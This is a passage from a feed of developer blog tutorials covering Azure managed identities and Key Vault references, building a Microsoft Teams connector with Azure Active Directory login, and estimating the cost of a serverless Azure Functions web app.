&lt;p&gt;Assigning an identity can be done purely from the Azure web app. As we see in the next chapter, there are two different kinds of identities, but the process is very similar: Navigate to the resource you want to assign an identity to, choose the &lt;em&gt;Identity&lt;/em&gt; tab in the resource navigation, and click on &lt;em&gt;Status: On&lt;/em&gt; or &lt;em&gt;Add&lt;/em&gt; (depending on which kind of identity you want to assign). The whole process is very well documented in &lt;a href="https://docs.microsoft.com/en-us/azure/app-service/overview-managed-identity?tabs=dotnet#adding-a-system-assigned-identity"&gt;this article&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Who am I? User-assigned vs. System-assigned identities
&lt;/h2&gt;

&lt;p&gt;When it comes to managed identities, we can choose from two different creation methods. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;System-assigned&lt;/strong&gt; identities are related directly to one specific Azure resource. You can deploy it via two clicks in all Azure resources that support managed identities. If the resource is deleted, the identity is removed as well.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;User-assigned&lt;/strong&gt; identities on the other hand can be connected to multiple Azure resources. They are created like every other Azure resource and can be used to group multiple resources together to have identical rights and permissions. When of these resources are deleted, the user-assigned identity continues to exist.&lt;/p&gt;

&lt;h2&gt;
  
  
  Making it talk: Requesting access to other resources
&lt;/h2&gt;

&lt;p&gt;At first, you have to configure which resources our newly created identity (called Alex like you might remember) has access to. If you ever assigned access rights to your co-workers on a specific Azure resource, this is a piece of cake for you. You just do the following:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Navigate to the resource that you want Alex to access&lt;/li&gt;
&lt;li&gt;Click on "Access Control (IAM)"&lt;/li&gt;
&lt;li&gt;Click on "Add", and then "Role assignment"&lt;/li&gt;
&lt;li&gt;Give it whatever role is suitable for your plans, and enter Alex' service principal ID under "Select"&lt;/li&gt;
&lt;li&gt;Hit save&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;And just like that you are all set! For screenshots and a more elaborate description of the process, go through &lt;a href="https://docs.microsoft.com/en-us/azure/role-based-access-control/role-assignments-portal"&gt;this documentation&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Now we can go to phase two: Giving Alex an access token to actually call other services. Depending on what kind of Azure service Alex is, we have  different ways to achieve this (and this article would blow up if we would cover all of them). But to clarify the concept, let's look at the flow for Virtual Machines.&lt;/p&gt;

&lt;h2&gt;
  
  
  Coming to life: Implementing Managed Identity calls on Virtual Machines
&lt;/h2&gt;

&lt;p&gt;For those of you who are already familiar to OAuth2 login flows, this flow should be somewhat familiar (but with far less security measures included): After we set up our Service Principal from the Azure portal, we call a certain URL and get a JSON Web Token back with which we can call other services. In detail:&lt;/p&gt;

&lt;p&gt;From your VM, call &lt;code&gt;http://169.254.169.254/metadata/identity/oauth2/token&lt;/code&gt;. Provide these query parameters:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;api-version&lt;/code&gt;: Specifies the internal API version to use for token acquiry. Must be &lt;code&gt;2018-02-01&lt;/code&gt; or higher.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;resource&lt;/code&gt;: The API that you want to call with the token acquired. Could be for example &lt;code&gt;https://management.azure.com/&lt;/code&gt; if you want to call the Azure API, or &lt;code&gt;https://vault.azure.net/&lt;/code&gt; for access to Key Vault.&lt;/li&gt;
&lt;li&gt;(Optional) &lt;code&gt;client_id&lt;/code&gt;: If you're using user-assigned identities, you must include this parameter with the client ID of your service principal. &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Why don't we use any secrets or any other verification to get a token? Well, we are already on the Virtual Machine when we get the token. Therefore you can see this call as machine internal, same like if we would access the file system. &lt;/p&gt;

&lt;p&gt;After you successfully requested your token, you will get back a JSON Web Token. This token can be used as an authorization to call other services (specified by &lt;code&gt;resource&lt;/code&gt;). And now you're done! Just one single call from your server for all Azure services, instead of implementing huge and service-specific authorization SDKs!&lt;/p&gt;

&lt;p&gt;To learn more about other resources and how to obtain an access token, check out &lt;a href="https://docs.microsoft.com/en-us/azure/active-directory/managed-identities-azure-resources/overview#how-can-i-use-managed-identities-for-azure-resources"&gt;this documentation&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Native security: Key Vault references
&lt;/h2&gt;

&lt;p&gt;This is already pretty cool. But it get's even better. A common scenario for service-to-service communication in Azure is the request of secrets. You wouldn't want to store app passwords or certificates in plain text on your server, and leaving them hardcoded as an environment variable is still a huge administrative overhead (and all your App developers can see the secrets). So it is a good idea to outsource all secrets somewhere, and Azure Key Vault is exactly that place. It stores secrets and certificates encrypted by a physical TPM module (if you never heard about that, don't worry: It is just as secure as it sounds), with strong auditing and features like auto-rotation. &lt;/p&gt;

&lt;p&gt;The only drawback: How can we access these secrets if they are not on our server? Ironically, we can use REST: Just call an URL, authorize with a &lt;strong&gt;secret&lt;/strong&gt; and get your other secret back. Do you spot the loophole? We trade in all of our secrets for one master-secret, but in the end we still have to manage a secret.&lt;/p&gt;

&lt;p&gt;For Azure App Services and through Managed Identities we have a very elegant way of fixing this. Just configure a Managed Identity for your App Service, give that Identity access to your Key Vault and use a &lt;em&gt;Key Vault reference&lt;/em&gt; to access your secrets. What is a Key Vault reference? In the environment variables of your App Service (in Azure, they are called App settings), instead of configuring &lt;code&gt;SECRET:pq289gni...&lt;/code&gt;, you can put in a reference. This looks like this: &lt;code&gt;SECRET:@Microsoft.KeyVault({secretUri})&lt;/code&gt;. With the right permissions in place (provided through Managed identities) your App Service now automatically pulls the secret from Key Vault at startup, and the secret is never exposed anywhere in the whole process.&lt;/p&gt;

&lt;p&gt;I hope you are now equipped with the knowledge to build super-robust apps on Azure. If you have any questions/feedback or some information is still missing, please provide some feedback!&lt;/p&gt;

</description>
      <category>security</category>
      <category>azure</category>
      <category>identity</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>Building a Microsoft Teams connector</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Sat, 02 Nov 2019 20:19:16 +0000</pubDate>
      <link>https://forem.com/urmade/building-a-microsoft-teams-connector-2bhp</link>
      <guid>https://forem.com/urmade/building-a-microsoft-teams-connector-2bhp</guid>
      <description>&lt;h1&gt;
  
  
  What is a connector?
&lt;/h1&gt;

&lt;p&gt;Teams connectors (or more specifically Office connectors) are inbound webhooks into Microsoft Teams. This means that a connector gives you an URL with which you can post messages in a specified channel at any time. &lt;br&gt;
GitHub for example uses this mechanism to notify your team when a new pull request was accepted into a certain repository, Trello can notify the team about upcoming deadlines. Besides MS Teams, Connectors can also be used in Outlook to notify users via mail.&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--F0fTzmmE--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://thepracticaldev.s3.amazonaws.com/i/g3kyov569piuujnlbv3d.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--F0fTzmmE--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://thepracticaldev.s3.amazonaws.com/i/g3kyov569piuujnlbv3d.png" alt="Office 365 Connectors" width="880" height="217"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;The basic functionality of a connector&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;A connector consists (from a developers perspective) of two parts: A configuration page and a backend. The configuration page is displayed directly in Teams and should be used to specify the content that is posted to the channel. So you could for example specify which task lists you want to monitor, about which type of messages you want to be notified, or how often you would like to receive notifications. The second part is the backend. Here you should store the webhook URL and send POST requests to that URL to send messages into the channel.&lt;/p&gt;

&lt;h2&gt;
  
  
  Configuring your connector for Teams
&lt;/h2&gt;

&lt;p&gt;Besides the implementation itself you will also need a Teams App that the user can install in order to access your connector in the first place. And to create a Teams App, you should use a Teams App. More specifically, App Studio offers you the capabilities to just click through the App creation process and gives you a manifest.json file which contains your app configuration. Although you only need that manifest.json in the end (and you could write it from scratch if you're into that) it is always recommendable to use App Studio. It offers all configuration options available for the manifest and offers built-in error checking.&lt;/p&gt;

&lt;p&gt;You will also need to register your connector in the &lt;a href="https://aka.ms/connectorsdashboard"&gt;Office 365 connector dashboard&lt;/a&gt;. Doing so gives you a connector ID which identifies your connector and gives your users more information about the organization that wants to post content into their channel. Besides some explanatory text for your connector, two settings are especially important: The configuration page (we will hear more about that in the next paragraph) and enabling actions on your card. If you do not enable actions, buttons that post a message to your app won't work (for example, you're posting a message into Teams that reminds you of an important task and you want to offer a button saying "Mark as completed"). When you successfully registered the connector, download the Teams manifest and start right away!&lt;br&gt;
&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--_Bh6-7uy--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://thepracticaldev.s3.amazonaws.com/i/1zjrzsm8uuvt8s0glaf7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--_Bh6-7uy--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://thepracticaldev.s3.amazonaws.com/i/1zjrzsm8uuvt8s0glaf7.png" alt="Teams Connector Dashboard" width="880" height="1231"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;You only have to provide this information to register your connector&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The configuration page is a HTML page that you can use to ask the user which data they want to get notified about in their channel. Specifically, you can ask for any information you need from the user, and based on this information you can select which data the channel just subscribed on and therefore which data you will send to the channel. Most of the following guide will be dedicated to writing a configuration page, so let's jump right in.&lt;/p&gt;

&lt;h2&gt;
  
  
  Developing your first connector
&lt;/h2&gt;

&lt;p&gt;For your first connector, you will need only a configuration page. You can print the webhook URL directly to the configuration page, and then use tools like &lt;a href="https://www.getpostman.com"&gt;Postman&lt;/a&gt; to send messages to your specified channel. You can find the code for this step &lt;a href="https://github.com/Urmade/TeamsConnectorDemo/tree/MVP"&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;To get our webhook URL, we have to register the connector within the channel. We need a Teams app, and this Teams app needs an URL to your configuration page (Note: localhost won't work, for developing you should use tools like &lt;a href="https://ngrok.com/download"&gt;ngrok&lt;/a&gt;). To interact with Teams from a frontend side, Teams offer the so-called Teams JavaScript SDK. In order to tell Teams if our configuration went successful, we will need the SDK. As we only want a webhook URL in the first step, we don't need any input elements in the HTML. We only need a container to display the webhook URL later on:&lt;br&gt;
&lt;code&gt;&amp;lt;span id="url"&amp;gt;&amp;lt;/span&amp;gt;&lt;/code&gt;. &lt;br&gt;
Now we can start working with the Teams context. Before using the Teams SDK, you always have to initialize it first. You can do this by calling &lt;br&gt;
&lt;code&gt;microsoftTeams.initialize();&lt;/code&gt;.&lt;br&gt;
Configuring a connector on the Teams side consists of four steps:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Providing additional information about your connector&lt;/li&gt;
&lt;li&gt;Receiving the webhook&lt;/li&gt;
&lt;li&gt;Telling Teams what to do when the user hits "Save"&lt;/li&gt;
&lt;li&gt;Enabling the "Save" button&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To give Teams more information about your connector, you should call &lt;code&gt;microsoftTeams.settings.setSettings({...})&lt;/code&gt; with the settings JSON object as the parameter. You need to provide these settings:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;entityId&lt;/code&gt;: An unique ID of your connector in the channel. Is needed when you want to reference your connector from within Teams (e.g. you want to create a link to the connector configuration)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;configName&lt;/code&gt;: The string that will be displayed to users when they look up their existing connector configurations in Teams&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;contentUrl&lt;/code&gt;: The URL which is called whenever the user wants to update the configuration&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;All together, the call could look like this:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;microsoftTeams.settings.setSettings({
    entityId: "sampleConn",
    configName: "sampleConfig",
    contentUrl: "https://e6d84899.ngrok.io"
});
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Next, we have to receive the webhook URL from Teams. This is actually a very familiar setting: We call &lt;code&gt;microsoftTeams.settings.getSettings((settings) =&amp;gt; {...})&lt;/code&gt;. In Teams the settings for your webhook are created as soon as you call setSettings(), so only then we can get the connector settings. getSettings() requires a callback that the settings are parsed to. For the moment we only want to print the webhook URL of the settings to the screen, so the call looks like this:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;microsoftTeams.settings.getSettings(s =&amp;gt; {
    document.getElementById("url").innerText = s.webhookUrl;
});
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Though we now got everything we came for, the webhook isn't activated yet. To activate it, we have to save our configuration. This process consists of two steps: First, we specify what should happen when the user clicks on "Save". To do so, we call &lt;code&gt;microsoftTeams.settings.registerOnSaveHandler((saveEvent) =&amp;gt; {...})&lt;/code&gt;. In the actual handler, we need to at least call &lt;code&gt;saveEvent.notifySuccess();&lt;/code&gt; to tell Teams that our saving process is successfully completed. And second we have to make the "Save" button clickable by calling &lt;code&gt;microsoftTeams.settings.setValidityState(true);&lt;/code&gt;. All together, our calls looks like this:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;microsoftTeams.settings.registerOnSaveHandler((saveEvent) =&amp;gt; {
    saveEvent.notifySuccess();
});
microsoftTeams.settings.setValidityState(true);
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;And here you go, your first connector is completed! Open Postman, copy your webhook URL into the URL bar, set your body to &lt;code&gt;application/json&lt;/code&gt; and POST this message:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
"text": "Hi I'm a connector test!"
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Your first connector message now is available in your channel!&lt;/p&gt;

&lt;h2&gt;
  
  
  Securing the connector: Adding authentication
&lt;/h2&gt;

&lt;p&gt;Now that you are able to play around with your first connector, you got the idea behind connectors. We can now start thinking about building a connector that actually could run in a production environment. From the configuration page, this means one thing above all: Security. We have to make absolutely sure that only authorized users are able to configure connectors. To do this, you should leverage Azure Active Directory (AAD) and log your users in before they are able to make any configurations. An implementation of this step can be found &lt;a href="https://github.com/Urmade/TeamsConnectorDemo/tree/Authentication-MVP"&gt;here&lt;/a&gt;. &lt;/p&gt;

&lt;p&gt;On the HTML side, you have to insert a new button into your page. Teams will spawn a popup if you want to authenticate your current user, and popups that are not triggered by a direct user interaction are usually blocked. In the example the default text is hidden in another div for UI reasons. This leaves you with this code:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;button id="login" onclick="login()"&amp;gt;Authenticate before configuring the connector!&amp;lt;/button&amp;gt;
&amp;lt;div id="success" style="display: none;"&amp;gt;
    Copy your webhook URL from here to POST messages in this channel: &amp;lt;span id="url"&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;
    Don't forget to click on "Save" to activate your connector.
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Triggering a login in the frontend SDK is pretty intuitive. Just call &lt;code&gt;microsoftTeams.authentication.authenticate({...})&lt;/code&gt; and specify the login URL, the proportions of the popup as well as success / failure callbacks. The only thing you should keep in mind is that the login URL must be on the same URL on which your configuration page is hosted. So you can't directly redirect on &lt;code&gt;example.secureLogin.com&lt;/code&gt; if your page runs on &lt;code&gt;mysite.com&lt;/code&gt;, but you have to redirect to &lt;code&gt;mysite.com/login&lt;/code&gt; first. &lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;function login() {
        microsoftTeams.authentication.authenticate({
            url: window.location.origin + "/login",
            width: 600,
            height: 535,
            successCallback: function (result) {
                console.log(result);
                configure();
            },
            failureCallback: function (reason) {
                console.error(reason);
            }
        });
    }
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;When a user hits the &lt;code&gt;/login&lt;/code&gt; endpoint, the example just redirects that user to the Azure Active Directory login page without any further checks. Creating a backend to support AAD logins is a (quite intuitive and fast) topic on its own, so to not bloat this article you can find instructions for that &lt;a href="https://dev.to/urmade/the-hands-on-beginners-guide-to-azure-active-directory-4ija"&gt;here&lt;/a&gt;. In the end, we get an access_token that contains some user information and enables you to call Microsoft services to get further information about the user. Though many tutorials directly get this token at the client side, this isn't a wise idea. Access tokens are valid for a hour, and whoever possesses such a token has access to sensitive user information. And as the client (more specifically, a browser) can have all kinds of vulnerabilities (like for example malicious add-ins) that could steal anything that goes over the wire, you shouldn't hand out such a sensitive token to your users. &lt;/p&gt;

&lt;p&gt;But how do we pass anything to the configuration page anyways? Right now you have a popup where the user can log in, but this isn't your config page. The answer again lies in the Teams SDK: When the login process has finished, you have to redirect your user to a new HTML page that you host. On this page, you initialize the Teams SDK and call &lt;code&gt;microsoftTeams.authentication.notifySuccess({...})&lt;/code&gt; or &lt;code&gt;microsoftTeams.authentication.notifyFailure()&lt;/code&gt; respective of if the login process succeeded. You could pass and access token as well as an id token to the client, but in the example implementation all this sensitive information is kept server-side. So you can send back just a placeholder indicating that everything succeeded (given that we won't need to persist the token anyways, you don't need to give some session ID to the client). The example uses &lt;a href="https://ejs.co/"&gt;ejs&lt;/a&gt; which is a very straightforward rendering engine for Node.js that allows to execute JavaScript whilst rendering HTML pages. The final code could look like this:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;microsoftTeams.initialize();

        //notifySuccess() closes the popup window and passes the specified information to the configuration page
        //Usually you would pass the tokens in here, but as we don't want to expose user tokens to the client and we only need a proof that the user is who we claims (authentication), we leave these fields empty
        &amp;lt;% if(successfulAuth) { %&amp;gt;
        microsoftTeams.authentication.notifySuccess({
        idToken: "N/A",
        accessToken: "N/A",
        tokenType: "N/A",
        expiresIn: "N/A"
    })
    &amp;lt;% } else { %&amp;gt;   
        microsoftTeams.authentication.notifyFailure("User could not be verified");
    &amp;lt;% } %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Calling this will close the popup and pass the information specified to the client. And just like that, you authenticated your user and made your app a lot safer!&lt;/p&gt;

&lt;h2&gt;
  
  
  Further steps to an awesome connector
&lt;/h2&gt;

&lt;p&gt;If you now send the webhook URL to your server instead of just displaying it to your user, you took every step to create a solid base for your actual connector logic. Now the actual fun part starts: You have to implement some configuration options for the user to choose from when setting up the connector, store the webhook URL in your backend and trigger some event mechanisms whenever an user should be notified. For storing your connector, you should keep a few things in mind:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Next to the webhook URL, you should also keep the channel ID to eventually check (via &lt;a href="https://developer.microsoft.com/en-us/graph"&gt;Microsoft Graph&lt;/a&gt;) the members of the channel.&lt;/li&gt;
&lt;li&gt;In your backend, you need a scalable and efficient process to trigger messages to the webhook URL. Utilize the &lt;a href="http://www.grahambrooks.com/event-driven-architecture/patterns/notification-event-pattern/"&gt;Notification Event Pattern&lt;/a&gt; or the &lt;a href="https://www.tutorialspoint.com/design_pattern/observer_pattern.htm"&gt;Observer Pattern&lt;/a&gt; and services like &lt;a href="https://docs.microsoft.com/en-us/azure/azure-functions/"&gt;Azure Functions&lt;/a&gt; or &lt;a href="https://azure.microsoft.com/en-us/services/event-grid/"&gt;Azure Event Grid&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Congratulations, you are now equipped to build an awesome connector and keep your Teams up-to-date about anything that happens in your application!&lt;/p&gt;

</description>
      <category>microsoftteams</category>
      <category>webdev</category>
      <category>tutorial</category>
      <category>javascript</category>
    </item>
    <item>
      <title>Serverless prototyping - A case study</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Sat, 26 Oct 2019 23:02:20 +0000</pubDate>
      <link>https://forem.com/urmade/serverless-prototyping-a-case-study-2laa</link>
      <guid>https://forem.com/urmade/serverless-prototyping-a-case-study-2laa</guid>
      <description>&lt;p&gt;Serverless computing is an exciting way of hosting your apps. It offers you unmatched scalability whilst making you only pay what you really used. In this article I will go through a case study on how an architecture for your serverless web app prototype could look like (on Microsoft Azure), some best practices and what it would cost you in the end.&lt;/p&gt;

&lt;h2&gt;
  
  
  What will be built?
&lt;/h2&gt;

&lt;p&gt;So you decided to use serverless computing, but what now? The good thing first: You're not really forced in any programming language. The Azure functions runtime offers some preferred languages, but due to its open source character you could modify it to work with any language of your choice.&lt;/p&gt;

&lt;p&gt;For your web app itself, you will most likely will have a front-end and a back-end. On the front-end site, you gain the most flexibility in terms of where to run your app (Mobile, Desktop, Web, …) with the classic HTML / CSS / JS stack. Plus, if you're fairly new to programming and don't have a deep knowledge in another specific language, those three are very easy to get into. For the backend, you can leverage the rich ecosystems of Node.js, .Net, Java or Python to get started quickly.&lt;/p&gt;

&lt;h2&gt;
  
  
  How to design your functions?
&lt;/h2&gt;

&lt;p&gt;Now to the interesting part: How could an architecture for our app look like? How do we define a function in our system? Is the operation a+b worth its own function or should we split on logical entities (e.g. search all entries of a database table, bring them in the right format and then return them)? As always, the truth is somewhere in the middle. &lt;br&gt;
From a hosting perspective, we have two metrics that determine how expensive a function will be for us: Execution time and memory consumption. So when splitting functions, it should always be our goal to overally minimize those two factors while keeping network traffic to a fair level without bringing a hell of communication latency into the system. &lt;br&gt;
And note the "overally minimize": With every communication between two functions you bring in a sending (packaging) and a receiving (parsing) step, as well as securing operations, which all again is taking its time (which is neglectable at first but can become a factor if overdone extremely).&lt;/p&gt;

&lt;p&gt;We can at least optimize for the networking and deployment bit by identifying functions that are highly dependent on each other. To understand why this is important, we have to peek "under the hood" of Azure Functions: &lt;br&gt;
Whenever we deploy our Function App Code to Azure, that code is stored somewhere with a reference to an ever-active URL that marks our Function APP API endpoint. When someone hits that API, Azure starts looking up for an available VM where it could deploy your app. Once found, it takes your code, puts it onto that VM and starts your main process. Once this is done, all your functions in the app are available. &lt;br&gt;
When traffic gets too high and the compute power on the current VM isn't enough to run your app, the code gets deployed to a second app and requests get distributed by a load balancer.&lt;br&gt;
That means for us: All functions in a single function app live and scale together, and if you have a function that is called once a month and one that is called 50 times a second, both of them will have to be deployed and initialized together in each scaling step. &lt;br&gt;
So to optimize scalability we can split our functions in "high-demand" functions and "just-sometimes" functions. Again, the additional time it takes Azure Functions to mount a few additional functions to a VM won't make the difference - but if we speak about dozens of functions, it may does. And on the other hand, functions which are often called together should be kept on the same deployment - this way you save a lot of networking overhead.&lt;/p&gt;

&lt;h2&gt;
  
  
  Services besides your functions
&lt;/h2&gt;

&lt;p&gt;If you're developing a web app, you will most likely have a front-end that shows HTML and loads a lot of scripts and static files. As we learned already, Azure Functions always takes your whole codebase and shifts it onto an available VM. What happens now if a Gigabyte of images has to be moved? Exactly, the startup time of your Functions App gets tremendously slower. &lt;br&gt;
So it would be recommendable to outsource as many bits and bytes as somehow possible - and this is where Azure Storage kicks in. With Azure (Blob) Storage you can store all your static files outside of your Functions App where they are always available and don't block scaling of your Web Application, while also being optimized for high-frequency delivery (think about CDNs and stuff like that, you have those options with Blob Storage but not if all your files are baked into your app). Plus, they are easily interchangeable and your app doesn't have to be redeployed every time you alter a picture.&lt;/p&gt;

&lt;p&gt;And we have a second storage issue: How do we persist dynamic data (like user inputs)? We need some kind of database to store all of that, and databases need VMs, and VMs cost a lot of money per month, and we don't have money, so is it in the end inevitable anyways to go bankrupt and fail? Again, Azure Storage to the rescue. Azure Table Storage provides a very cheap "pseudo-SQL" database where you can store all kinds of data. I call it pseudo-SQL as it takes objects of key-value pairs as parameters and flattens them all in one big table where every distinct key that exists in at least one object gets a column. And it doesn't offer a rich query language, so you are mostly stuck with storing and retrieving data. As long as you create collections (the NoSQL equivalent of tables) with some sort of meaning, you're good to go (for the start).&lt;br&gt;
And the best thing: The API for Table Storage and Cosmos DB (Azures high-performance database) are exactly the same, so if advanced queries and analytics and answers in the single-digit millisecond become a thing at your organization, having that is only a paramater away.&lt;/p&gt;

&lt;p&gt;Are we done now with theory? Yes. You can finally start developing your own Azure Functions driven web app. I would recommend following structure for your project: You will need a function for every page you want to display to the customer (e.g. yourdomain/ and yourdomain/about) where you do the website rendering and send out the final file to the user (Which is also a great way to monitor your traffic and latency for each page). And you will of course need one function for every API endpoint that you provide (e.g. GET yourdomain/api/user, POST yourdomain/api/user, …). If you only have simple CRUD operations for your database, I would leave it with this setup. &lt;br&gt;
If you however want to make more complex calculations that involve parallel computing (e.g. for every item in my array do something wildly complex), you could split up your functions API. If you have long-running orchestration functions that have to wait for other functions, familiarize yourself with durable functions. &lt;br&gt;
Whenever these functions trigger another function, they go to sleep and wake up when all "sub-"functions are done executing. This way, you only pay for the functions which are actively doing stuff.&lt;/p&gt;

&lt;h2&gt;
  
  
  Architecture done, but why does my app get horribly slow sometimes?
&lt;/h2&gt;

&lt;p&gt;Remember the whole "Spin up a new VM and deploy my code to it"-process? This is called startup of your Functions App, and its one of the main principles of serverless computing (only use your code whenever it is really needed). &lt;br&gt;
Your functions transitions from being in a "cold" state (meaning it isn't deployed) to a "hot" state (meaning it is deployed and ready to serve requests immediatly). This process is constantly optimized to go faster by the Azure developers, but at the time writing this article it can still take up to ten seconds until your app is responding. After receiving a call and brining your App into a hot state, Azure Functions keeps your App hot for five minutes (By the time writing this article). Whenever it receives a new call, the clock starts ticking again for five minutes. After that, it clears your code from the VM and sends your App into cold state. &lt;br&gt;
So theoretically you would need at least one user every five minutes to keep your App alive, which will probably not always be the case. &lt;/p&gt;

&lt;p&gt;But there is an (unofficial) trick to simulate this effect: There are so-called time trigger functions which execute always after a specified time period. If you now add one of these time triggered functions to your project and set it off to execute every 4 Minutes 30 (It doesn't matter what the function does, just let it log a char or something like that), you have an activity in your app that keeps your app constantly in a hot state. &lt;br&gt;
And as functions are optimized to be cheap for a huge amount of small compute activities, that roughly 9.000 calls per month that you "waste" actually cost you absolutely nothing (the first million calls in a function app per month are free). So this way you will always keep one VM occupied with your code and have your systems up and running at all times.&lt;/p&gt;

&lt;h2&gt;
  
  
  Do I have to ping an .azuresomething URL now?
&lt;/h2&gt;

&lt;p&gt;As you have sure noticed Functions provides you with a standard URL from which you can call your service. This URL usually consists of the name of &lt;em&gt;your Functions App&lt;/em&gt;.azurewebsites.net and is quite impractical if actual customers should engage with it (but at least its HTTPS-enabled by default, so you got that going for you). &lt;br&gt;
If you want to release your Application, you most likely will want to bring in a custom domain from which your app should be reachable. And with Azure Functions you can do that in just a few clicks. Functions Apps are just basic Web Apps in Azure which can be configured in the exact same way. To access the Web App settings just click on "Platform Features" in the starting page of your Functions App and you're good to go. See &lt;a href="https://docs.microsoft.com/en-us/azure/app-service/app-service-web-tutorial-custom-domain"&gt;this documentation&lt;/a&gt; on how to add your custom domain then.&lt;/p&gt;

&lt;p&gt;And it get's even better. Usually when you host something with your own domain, you don't have a SSL certificate to enable HTTPS communication. This means that all of your users will most likely see a warning stating that your site is insecure and should not be trusted. With Azure Web Apps you have to possibility to configure a LetsEncrypt plugin that automatically creates and renews SSL certificates for your custom domain. To do this, just follow &lt;a href="https://www.hanselman.com/blog/SecuringAnAzureAppServiceWebsiteUnderSSLInMinutesWithLetsEncrypt.aspx"&gt;this article&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Great, but let's get to business. How much will that make?
&lt;/h2&gt;

&lt;p&gt;(Before we start: All pricing detail reference the Western Europe Datacenter, are given in Euro and were taken in March 2019). Remember that we have three parts in our application: We have our Functions App for the logic and an Azure Storage with a Blob Storage and a Table Storage to host our website files and our data. So let's break down the single components:&lt;/p&gt;

&lt;h3&gt;
  
  
  Calculating cost for the functions apps
&lt;/h3&gt;

&lt;p&gt;The Functions App is meant to support large concurrent tasks. It also offers a very generous free contingent of 1.000.000 API hits and the 400.000 GB-seconds per month.&lt;/p&gt;

&lt;p&gt;Wait, what are GB-seconds? Besides of tracking how often your APIs are hit, Azure Functions also measures the RAM consumption of your Application. That means: For every second that your app is running, its RAM impact gets measured. If your App needs less than 1 GB of RAM, one GB-s will be charged. If it uses e.g. 1.3 GB of RAM in that second, two GB-s will be charged (keep that in mind when implementing compute-intensive functions). &lt;br&gt;
But due to the free contingent, you could run nearly ten concurrent functions without a pause through the whole month (assuming that your RAM consumption stays below 1 GB) without paying a dime. And remember, Functions only charge for when your function is running, meaning idle time in hot state is completely free of charge. &lt;br&gt;
Some technical details about this metric: Measurement is done in 128 MB intervals, and one function in the standard tier can take up a maximum of 1.536 MB of RAM.&lt;/p&gt;

&lt;p&gt;Although our compute cost is the one kicking in earlier, we still have a second metric. So let's look at the second metric, API hits.&lt;br&gt;
As you might remember we are using time trigger functions every 4 minutes 30 seconds to keep our app alive. That adds up to roughly 9.000 calls a month, leaving 991.000 free calls per month. If we're assuming a typical user of your app checks in twice a day every day of the week and uses during one session 50 function calls (page loading and interactions with the API like creating and deleting elements), you could support nearly 354 concurrent users within the free contingent.&lt;/p&gt;

&lt;p&gt;But what happens when you exceed your free budget? Is that when the price trap finally snatches? Not really.&lt;/p&gt;

&lt;p&gt;Let's calculate with 500 active users for your app. Using the scenario described above, these users would trigger 1.400.000 function calls each month, so we would pay 0.17€ for an additional million function executions. We will also have to pay for 1.000.000 additional GB-s, which costs us 14€. For 500 active users in our system, this leaves us with 14,17€ of hosting cost. This is a cost of not even 3 cents per user in your system!&lt;/p&gt;

